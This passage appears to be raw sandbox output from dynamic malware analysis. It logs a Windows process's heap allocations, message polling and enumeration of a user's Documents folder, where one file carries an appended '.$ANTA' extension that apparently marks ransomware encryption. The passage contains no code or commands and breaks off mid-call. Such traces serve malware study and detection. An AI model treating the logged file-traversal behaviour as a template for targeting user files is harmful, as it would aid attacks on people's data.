RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0080.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0080.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0080.315] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0080.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0080.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.317] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x58) returned 0x42e32e0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42e32e0 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0080.318] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.319] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.319] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0080.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.320] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.320] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.320] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.321] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.322] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xfbffcf4e, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbffcf4e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad78, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0080.323] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xfbffcf4e, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbffcf4e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad78, cFileName="..", cAlternateFileName="")) returned 1 [0080.323] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbbd0edc, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfbbd0edc, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbc435e3, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x2240, dwReserved0=0x0, dwReserved1=0x43cad78, cFileName="4lc7ZSflvh25kv.pps.$ANTA", cAlternateFileName="4LC7ZS~1.$AN")) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 